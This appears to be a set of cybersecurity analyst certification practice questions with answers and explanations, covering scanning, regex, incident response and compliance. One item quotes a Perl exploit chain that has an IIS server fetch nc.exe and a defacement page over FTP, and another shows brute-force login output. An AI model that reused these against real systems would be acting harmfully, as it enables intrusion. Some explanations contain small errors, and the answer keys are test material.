The structure and content of your web directories If directory browsing is enabled on a web server, it can expose the structure and content of your web directories to an attacker, potentially revealing sensitive information or giving the attacker information that could be used to exploit the server. Enabling directory browsing does not expose the private keys of your SSL certificates, as these should be stored securely and not accessible through directory browsing. Unless your company's financial records are improperly stored in the web directories, enabling directory browsing on a web server should not expose them. Directory browsing on a web server typically wouldn't expose user email addresses unless they were stored unsecured in the web directories, which is a separate issue.
In a network vulnerability assessment report, several zero-day and critical vulnerabilities were discovered. Why might this necessitate immediate action? Because they indicate a need to hire more staff Because they signal a need to decrease the frequency of vulnerability assessments Because zero-day and critical vulnerabilities improve the system's performance These vulnerabilities present significant risk due to no current security fix being available
These vulnerabilities present significant risk due to no current security fix being available Zero-day and critical vulnerabilities are high-risk issues that can severely compromise a system's security. One example of a zero-day virus that caused significant havoc is the "WannaCry" ransomware. It exploited a vulnerability in the Windows operating system, spreading rapidly across networks and encrypting files, demanding ransom payments in exchange for decryption. These types of vulnerabilities are significant threats, not performance enhancers. While additional resources might be needed for vulnerability management, the presence of critical vulnerabilities doesn't directly indicate staffing needs. On the contrary, critical vulnerabilities might suggest a need for more frequent and thorough assessments.
You just completed an nmap scan against a workstation and received the following output:-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-# nmap diontraining012Starting Nmap ( http://nmap.org )Nmap scan report for diontraining012 (192.168.14.61)Not shown: 997 filtered portsPORT STATE 135/tcp open139/tcp open445/tcp open Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-Based on these results, which of the following operating system is most likely being run by this workstation? Windows Ubuntu CentOS macOS
Windows The workstation is most likely running a version of the Windows operating system. Port 139 and port 445 are associated with the SMB file and printer sharing service run by Windows. Since Windows 2000, the NetBIOS file and print sharing has been running over these ports on all Windows systems by default.
Consider the following REGEX search string:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.<br /> (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.<br /> (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Which of the following strings would NOT be included in the output of this search? 001.02.3.40 1.2.3.4 37.259.129.207 205.255.255.001
37.259.129.207 The \b delimiter indicates that we are looking for whole words for the complete string. The REGEX is made up of four identical repeating strings, (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.". For now, let us refer to these octets, such as the ones used in internet protocol version 4 addresses. Each octet will allow the combination of 25[0-5] OR (|) 2[0-4][9-] OR numbers 00-99 is preceded by (?) a 0 or 1, or just a single number followed by a ".". Since the period is treated as a special character in a REGEX operator, the escape character (\) is required to enable the symbol to act as a dot or period in the output. This sequence repeats four times, allowing for all variations of normal IP addresses to be entered for values 0-255. Since 259 is outside the range of 255, this is rejected. More specifically, character strings starting with 25 must end with a number between 0 and 5 (25[0-5]). Therefore, 259 would be rejected. Now, on exam day, if you received a question like this, you can try to figure out the pattern as explained above, or you can take the logical shortcut. The logical shortcut is to look at the answer first and see that they all look like IP addresses. Remember, grep, and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don't be afraid to take a logical guess if you need to conserve time during your exam. So, which one isn't a valid IP address? Clearly, 37.259.129.107 is not a valid IP address, so if you had to guess as to what wouldn't be an output of this complex-looking command, you should guess that one!
A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active? A DNS forward or reverse lookup A whois query A zone transfer Using maltego
A zone transfer DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a DNS transaction type. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. DNS zone transfers are an active technique. Performing a whois query is a passive reconnaissance technique that performs a query of the databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. Performing a DNS forward and reverse lookup zones is an active technique that allows the resolution of names to IP addresses and IP addresses to names. This can be conducted as a passive technique. Maltego is used for open-source intelligence and forensics. It focuses on providing a library for data discovery from open sources and visualizing that information in a graph format suitable for link analysis and data mining. It collects this information passively since it can acquire the information from whois lookup servers, a DNS lookup tool using public DNS servers, or even emails and hostnames one can acquire from TheHarvester.
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring? Trend Heuristic Behavior Anomaly
Behavior This is an example of behavior-based detection. Behavior-based detection (or statistical- or profile-based detection) means that the engine is trained to recognize baseline traffic or expected events associated with a user account or network device. Anything that deviates from this baseline (outside a defined level of tolerance) generates an alert. The heuristic analysis determines whether several observed data points constitute an indicator and whether related indicators make up an incident depend on a good understanding of the relationship between the observed indicators. Human analysts are typically good at interpreting context but work painfully slowly, in computer terms, and cannot hope to cope with the sheer volume of data and traffic generated by a typical network. Anomaly analysis is the process of defining an expected outcome or pattern to events and then identifying any events that do not follow these patterns. This is useful in tools and environments that enable you to set rules. Trend analysis is not used for detection but instead to better understand capacity and the system's normal baseline. Behavioral-based detection differs from anomaly-based detection. Behavioral-based detection records expected patterns concerning the entity being monitored (in this case, user logins). Anomaly-based detection prescribes the baseline for expected patterns based on its own observation of what normal looks like.
A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");$o=; print "Opening FTP connection...\n";<br />sy
Chained exploit The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly where a program that occurs while writing data to a buffer overruns the buffer's boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor.
You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible. What should you do? Change all devices and servers that support it to port 636 since encrypted services run by default on port 636 Mark this as a false positive in your audit report since the services that typically run on ports 389 and 636 are identical Conduct remediation actions to update encryption keys on each server to match port 636 Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks
Change all devices and servers that support it to port 636 since encrypted services run by default on port 636 LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP but typically runs unencrypted LDAP services over this port. Instead, you should change all devices and servers that can technically support the change to port 636 since LDAP services over port 636 are encrypted by default.
Jeff has been contacted by an external security company and told that they had found a copy of his company's proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately? Investigate if the source code was downloaded Change the repository from public to private Delete the repository Revaluate the organization's information management policies Explanation
Change the repository from public to private Jeff should immediately change the repository from public to private to prevent further exposure of the source code. Deleting the repository would also fix the issue but could compromise the company's ongoing business operations. Reevaluation of the company's information management policies should be done, but this is not as time-critical as changing the repository's public/private setting. Once the repository is configured to be private, then Jeff should investigate any possible compromises that may have occurred and reevaluate their policies.
You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-[ATTEMPT] target 192.168.1.142 - login "root" - pass "abcde" 1 of 10[ATTEMPT] target 192.168.1.142 - login "root" - pass "efghi" 2 of 10[ATTEMPT] target 192.168.1.142 - login "root" - pass "12345" 3 of 10[ATTEMPT] target 192.168.1.142 - login "root" - pass "67890" 4 of 10 What type of test is the penetration tester currently conducting? Conducting a brute force login attempt of a remote service on 192.168.1.142 Conducting a ping sweep of 192.168.1.142/24 Conducting a Denial of Service attack on 192.168.1.142 Conducting a port scan of 192.168.1.142
Conducting a brute force login attempt of a remote service on 192.168.1.142 The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.
When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used? Data masking Data minimization Anonymization Tokenization
Data masking Data masking can mean that all or part of a field's contents is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. Reducing what information is collected reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.
Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor's tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it? Dissemination Analysis Collection Feedback
Dissemination The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights. The collection phase is usually implemented by administrators using various software suites, such as security information and event management (SIEM). This software must be configured with connectors or agents that can retrieve data from sources such as firewalls, routers, IDS sensors, and servers. The analysis phase focuses on converting collected data into useful information or actionable intelligence. The final phase of the security intelligence cycle is feedback and review, which utilizes both intelligence producers and intelligence consumers' input. This phase aims to improve the implementation of the requirements, collection, analysis, and dissemination phases as the life cycle is developed.
Which of the following vulnerabilities was considered the MOST critical because of its potential for a high degree of impact and exploitability? Carbanak BlueSmack Heartbleed ROBOT Attack
Heartbleed The Heartbleed bug is a serious vulnerability in the OpenSSL cryptographic software library. It was first disclosed in April 2014 and allowed anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromised the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. The Heartbleed bug in OpenSSL could have serious consequences, such as private key theft, making it a critical vulnerability. Carbanak is a sophisticated malware that was used in a series of targeted attacks against financial institutions from 2013 to 2015. The malware was able to steal millions of dollars from banks in over 30 countries. While the Carbanak attacks were significant, they involved targeted phishing and advanced persistent threats (APTs), not a widespread vulnerability like Heartbleed. The ROBOT attack is a type of man-in-the-middle attack that can be used to steal sensitive information from a TLS-protected connection. The attack works by exploiting a vulnerability in the RSA encryption algorithm that is used to secure TLS connections. The ROBOT Attack was a significant vulnerability affecting the RSA encryption algorithm, but it didn't have the same level of impact or exploitability as Heartbleed. Bluesmack is a type of Denial-of-Service (DoS) attack that can be used to disable Bluetooth-enabled devices. The attack works by sending a specially crafted packet to the target device that causes it to crash or become unresponsive. While BlueSmack was a significant vulnerability affecting Bluetooth devices, it did not have the same global impact or exploitability as Heartbleed.
What containment technique is the strongest possible response to an incident? Segmentation Isolating affected systems Enumeration Isolating the attacker
Isolating affected systems Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack, placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term used but would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.
How does timely and effective communication and reporting of vulnerabilities assist an organization in meeting the GDPR's requirement of reporting data breaches within 72 hours of detection? It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority It proves that the organization is immune to data breaches It ensures that all employees will always adhere to data protection regulations It guarantees all vulnerabilities will be fixed within 72 hours
It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority By identifying and addressing vulnerabilities promptly, the organization can more effectively manage incidents and meet the GDPR's 72-hour reporting requirement. Organizations that fail to report data breaches to the supervisory authority or to individuals affected by the breach may be subject to fines of up to €20 million or 4% of global annual turnover, whichever is greater. No organization is completely immune to data breaches, as new threats and vulnerabilities continuously evolve. While training and policies can encourage compliance, human errors or misconduct can still occur. While this would be ideal, the complexity of certain vulnerabilities may require more time for a comprehensive fix.
During your review of the firewall logs, you notice that an IP address from within your company's server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident? IP addresses and other network-related configurations were exfiltrated Raw financial information about the company was accessed PII of company employees and customers was exfiltrated Forensic review of the server required fallback to a less efficient service
PII of company employees and customers was exfiltrated If the PII (Personally Identifiable Information) of the company's employees or customers were exfiltrated or stolen during the compromise, this would increase the incident's impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact of the assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company's size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.
You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? Rootkit Ransomware POS malware Keylogger
POS malware Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card's track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system. Ransomware is a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send to back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.
An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account's cached credentials when the user logged into an SSO system? Pivoting Lateral movement Pass the hash Golden ticket
Pass the hash Pass the Hash (PtH) is the process of harvesting an account's cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.
As an incident response manager, you've just concluded an incident where an attacker was able to breach your network by exploiting an unpatched vulnerability. In reviewing the incident, you realize that alerts regarding the vulnerability were overlooked due to a high volume of alerts. What should be your immediate next step to prevent similar occurrences? Increase the alert volume to ensure nothing is missed I Perform a root cause analysis Ignore the incident since it was resolved Hire more incident response team members
Perform a root cause analysis A root cause analysis can help understand why important alerts were missed and guide improvements in your alert management system to prevent similar oversights in the future. While having more team members may help manage alerts, it does not address the underlying issue of alert fatigue or inadequate alert management. Increasing the alert volume may exacerbate the problem by contributing to alert fatigue, making it more difficult for important alerts to be noticed. Ignoring the issue won't prevent similar incidents in the future. Learning from incidents is a crucial part of improving security posture.
During a collaboration between a startup and a multinational corporation, the signed Memorandum of Understanding (MOU) has placed some limitations on the startup's system access. What could this potentially lead to? Potentially restricting ability to fully remediate vulnerabilities An increase in the cybersecurity measures employed by the multinational corporation A reduction in overall project costs Greater market visibility for the startup
Potentially restricting ability to fully remediate vulnerabilities This situation could potentially lead to the startup having a restricted ability to fully remediate vulnerabilities within their systems. Due to the limitations placed by the MOU, the startup might not have the necessary access to apply patches, make configuration changes, or implement compensating controls as swiftly or comprehensively as needed. This could increase the time it takes to remediate vulnerabilities and potentially increase their exposure to risk. While the MOU outlines the agreement between the two parties, it does not inherently lead to cost reductions. While collaborating with a large corporation may increase visibility, this is unrelated to vulnerability management. The MOU does not directly affect the cybersecurity measures of the multinational corporation.
Among the following strategies for dealing with multiple known vulnerabilities, which one is deemed MOST crucial for their successful management and mitigation? The location of vulnerabilities Prioritizing the risk level associated with each vulnerability The number of vulnerabilities The type of vulnerabilities
Prioritizing the risk level associated with each vulnerability Risk prioritization is an essential part of vulnerability management, focusing on the most significant threats in a cybersecurity landscape. It involves assessing potential vulnerabilities, considering their likelihood of exploitation, and the potential impact of such an event. After prioritizing vulnerabilities, the highest-risk ones are addressed first, using methods such as software patching or security policy enhancement. This process is continuously revisited and adjusted as new threats and vulnerabilities emerge. While knowing where vulnerabilities reside is important, it's not the main factor in prioritization. The risk each vulnerability carries is more critical. The type of vulnerabilities may provide some context, but it is the risk associated with each that should primarily drive prioritization. The number alone does not give an accurate picture of prioritization. Not all vulnerabilities pose the same level of risk.
You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions? Disable unused user accounts Review and enhance patch management policies Proactively sanitize and reimage all of your routers and switches Restrict host access to peripheral protocols like USB or Bluetooth
Proactively sanitize and reimage all of your routers and switches Since your team could not determine the root cause of the compromise, you would most likely conduct system and network hardening actions as part of the recovery and remediation. The only option that is not considered a hardening action is proactively sanitizing and reimaging your routers and switches. If you performed this action, you could have unwanted disruptive effects on the company. Instead, it would be more beneficial to increase monitoring of the devices to ensure they are not compromised. Proactively sanitizing and reimaging all of the routers and switches would be a large undertaking. Without evidence suggesting that such an approach is warranted, you would be wasting a lot of time and money. The other options presented are the best security practices to prevent future compromises. Reimaging the network devices without knowing the root cause will likely be ineffective in securing the network.
Which of the following types of data breaches would require that the US Department of Health and Human Services and the media be notified if more than 500 individuals are affected by a data breach? Credit card information Personally identifiable information Protected health information Trade secret information
Protected health information Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPPA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach. Personally identifiable information (PII) is any data that can be used to identify, contact, or impersonate an individual. Credit card information is protected under the PCI DSS information security standard. Trade secret information is protected by the organization that owns those secrets.
In 2013, retail giant Target Corporation experienced a massive data breach, exposing the credit and debit card information of 40 million customers. Following this security incident, a special team was tasked with investigating the fundamental cause of the breach, uncovering the sequence of events that led to it, and providing insights to prevent such occurrences in the future. What term best describes this deep-dive investigative process? Lessons learned Incident response plan Root cause analysis Forensic analysis
Root cause analysis Root cause analysis involves identifying the initial cause or the underlying factors that contributed to an incident. An incident response plan outlines procedures and processes for handling security incidents. It is a preparation tool, not a post-incident activity to identify the underlying cause of an incident. The lessons learned process involves reviewing an incident to identify what was done well and what needs improvement for future responses. It does not primarily focus on identifying the underlying cause of the incident. While forensic analysis involves a meticulous examination of all evidence related to an incident, its primary aim is not to identify the underlying cause.
Dion Training has just suffered a website defacement of its public-facing webserver. The CEO believes the company's biggest competitor may have done this act of vandalism. The decision has been made to contact law enforcement so that evidence can be collected properly for use in a potential court case. Laura is a digital forensics investigator assigned to collect the evidence. She creates a bit-by-bit disk image of the web server's hard drive as part of her evidence collection. What technology should Laura use after creating the disk image to verify the copy's data integrity matches that of the original web server's hard disk? 3DES AES RSA SHA-256
SHA-256 SHA-256 is the Secure Hash Algorithm with a 256-bit length output. This is one of the most common hash algorithms in use and is employed in many applications and protocols. SHA-256 and other hashing algorithms are used to ensure the data integrity of a file has not been altered. RSA, 3DES, and AES are all encryption algorithms. These algorithms can ensure confidentiality but not integrity
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database? Cross-site scripting SQL injection Denial of service Buffer overflow
SQL injection A SQL injection poses the most direct and more impactful threat to an organization's database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn't intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow for other malicious code running. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused on the user, not the server or database.
Dion Training wants to install a new accounting system and is considering moving to a cloud-based solution to reduce cost, reduce the information technology overhead costs, improve reliability, and improve availability. Your Chief Information Officer is supportive of this move since it will be more fiscally responsible. Still, the Chief Risk Officer is concerned with housing all of the company's confidential financial data in a cloud provider's network that might be shared with other companies. Since the Chief Information Officer is determined to move to the cloud, what type of cloud-based solution would you recommend to account for the Chief Risk Officer's concerns? SaaS in a public cloud SaaS in a private cloud PaaS in a community cloud PaaS in a hybrid cloud
SaaS in a private cloud A SaaS (Software as a Service) solution best describes an accounting system or software used as part of a cloud service. This meets the CIO's requirements. To mitigate the concerns of the Chief Risk Officer, you should use a private cloud solution. This type of solution ensures that the cloud provider does not comingle your data with other customers' data and providers dedicated servers and resources for your company's use only.
Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization's data center? Schedule scans to run during peak times to simulate performance under load Schedule scans to run during periods of low activity Schedule scans to be conducted evenly throughout the day Schedule scans to begin at the same time every day
Schedule scans to run during periods of low activity For the best results, the scans should be scheduled during periods of low activity. This will help to reduce the negative impact of scanning on business operations. The other three options all carry a higher risk of causing disruptions to the network or its business operations.
In the Diamond Model of Intrusion Analysis, what does the Capability component represent? The tools and techniques used in the attack (Correct) The entity that is targeted by the attack The physical and virtual resources utilized in the attack The entity conducting the attack
The tools and techniques used in the attack The Capability component of the Diamond Model of Intrusion Analysis represents the tools and techniques used in the attack. The entity conducting the attack is represented by the Adversary, not Capability. The entity that is targeted by the attack is represented by the Victim, not Capability. The physical and virtual resources utilized in the attack are represented by Infrastructure, not Capability.
You are a cybersecurity analyst for a mid-sized company. One day, you decided to perform a routine scan of your internal network using the Angry IP Scanner tool. The output returned was as follows: IP Ping Hostname Ports TTL 192.168.1.1 34 ms router.domain.com 80, 443 64 192.168.1.2 40 ms pc1.domain.com 22, 80, 443 128 192.168.1.3 Timeout pc2.domain.com - - 192.168.1.4 45 ms unknown.device 21, 23, 25, 80, 443, 3389 64 Based on this output, which of the following represents a potential indicator of compromise (IoC) that should be investigated further? The open ports 80 and 443 on 192.168.1.1 The open port 22 on 192.168.1.2 The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389 The timeout response from 192.168.1.3 Explanation
The unknown device 192.168.1.4 with multiple open ports, including 21, 23, 25, and 3389 The unknown device at 192.168.1.4 is a potential indicator of compromise (IoC) due to several reasons. First, the device is unknown, which suggests that it's not a recognized system within the network, thus raising suspicions. Secondly, it has multiple ports open, including 21 (FTP), 23 (Telnet), 25 (SMTP), 80 (HTTP), 443 (HTTPS), and 3389 (RDP). These ports being open could indicate services that are vulnerable to exploitation or are already being exploited, especially when they are on an unrecognized device. The combination of an unknown device and open ports commonly used for management or data transfer warrants further investigation. The open ports 80 and 443 on 192.168.1.1 represent standard web services (HTTP and HTTPS). If 192.168.1.1 is a web server or a network device with a web-based management interface (which is common), these ports would likely be open as part of normal operation. The timeout response from 192.168.1.3 is not necessarily an indicator of compromise. It could merely be that the system was offline or unreachable at the time of the scan. The open port 22 on 192.168.1.2 is for SSH, a secure method of remote administration commonly used in many environments. Although it should be secured and monitored, its mere presence isn't an immediate indicator of compromise.
Your organization's primary operating system vendor just released a critical patch for your servers. Your system administrators have recently deployed this patch and verified the installation was successful. This critical patch was designed to remediate a vulnerability that can allow a malicious actor to execute code on the server over the Internet remotely. You ran a vulnerability scan of the network and determined that all servers are still being reported as having the vulnerability. You verified all your scan configurations are correct. Which of the following might be the reason that the scan report still showing the servers as vulnerable? (SELECT ALL THAT APPLY) You conducted the vulnerability scan without waiting long enough after the patch was installed The vulnerability assessment scan is returning a false positive The wrong IP address range was scanned during your vulnerability assessment This critical
The vulnerability assessment scan is returning a false positive This critical patch did not remediate the vulnerability There are two reasonable choices presented: (1) the vulnerability assessment scan is returning a false positive, or (2) this critical patch did not remediate the vulnerability. It is impossible to know which is based on the description in the question. If the patch was installed successfully, as the question states, then it is possible that the critical patch was coded incorrectly and did not actually remediate the vulnerability. While most operating system vendors test their patches before release to prevent this, they are sometimes rushed into production with extremely critical patches. The patch does not actually remediate the vulnerability on all systems. When this occurs, the vendor will issue a subsequent patch to fix it and supersede the original patch. The other option is that the vulnerability assessment tool is incorrectly configured and is returning a false positive. This can occur when the signature used to detect the vulnerability is too specific or too generic to actually detect whether the system was patched for the vulnerability or not. The other options are incorrect, as you do not have to wait a certain period of time after installation before scanning. It is assumed that you are scanning the same IP range both times as you have verified your scan configuration.
Which of the following is NOT a valid reason to conduct reverse engineering? To allow the software developer to spot flaws in their source code To allow an attacker to spot vulnerabilities in an executable To commit industrial espionage To determine how a piece of malware operates
To allow the software developer to spot flaws in their source code If a software developer has a copy of their source code, there is no need to reverse engineer it since they can directly examine the code. Doing this is known as static code analysis, not reverse engineering. Reverse engineering is the process of analyzing a system's or application's structure to reveal more about how it functions. In malware, examining the code that implements its functionality can provide you with information as to how the malware propagates and what its primary directives are. Reverse engineering is also used to conduct industrial espionage since it can allow a company to figure out how a competitor's application works and develop its own version. An attacker might use reverse engineering of an application or executable to identify a flaw or vulnerability in its operation and then exploit that flaw as part of their attack.
When applying patches as part of vulnerability management, why is it crucial to communicate the patching schedule and potential impacts to relevant stakeholders? To help management make effective risk base decisions on system disruptions due to patching To improve the company's marketing strategies To enable stakeholders to plan company-wide meetings To increase the company's profitability
To help management make effective risk base decisions on system disruptions due to patching Correct answer: This communication allows stakeholders to understand potential impacts on system availability and to plan activities accordingly, reducing disruptions. Patching schedules have little to do with marketing strategies; the main goal is to manage system availability and reduce disruptions. While secure operations can contribute to profitability, communicating about patching specifically aims to manage system downtime and business impact. While communication is essential in any organization, the purpose of discussing patching schedules specifically is to manage potential system downtime.
An organization is conducting a cybersecurity training exercise. What team is Jason assigned to if he has been asked to monitor and manage the defenders' and attackers' technical environment during the exercise? Red team Blue team White team Purple team
White team Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender's mission. A red team is a group of people authorized and organized to emulate a potential adversary's attack or exploitation capabilities against an enterprise's security posture. A blue team is a group of people responsible for defending an enterprise's use of information systems by maintaining its security posture against a group of mock attackers. The purple team is made up of both the blue and red teams to work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.
You are investigating traffic involving three separate IP addresses (192.168.66.6, 10.66.6.10, and 172.16.66.1). Which REGEX expression would you use to be able to capture ONLY those three IP addresses in a single statement? \b(192\.168\.66\.6)+(10\.66\.6\.10)+(172\.16\.66\.1)\b \b[192\.168\.66\.6]+[10\.66\.6\.10]+[172\.16\.66\.1]\b \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b \b[192\.168\.66\.6]|[10\.66\.6\.10]|[172\.16\.66\.1]\b
\b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b The correct option is \b(192\.168\.66\.6)|(10\.66\.6\.10)|(172\.16\.66\.1)\b, which uses parenthesis and "OR" operators (|) to delineate the possible whole-word variations of the three IP addresses. Using square braces indicates that any of the letters contained in the square braces are matching criteria. Using the + operator indicates an allowance for one more instance of the preceding element. In all cases, the period must have an escape (\) sequence preceding it as the period is a reserved operator internal to REGEX.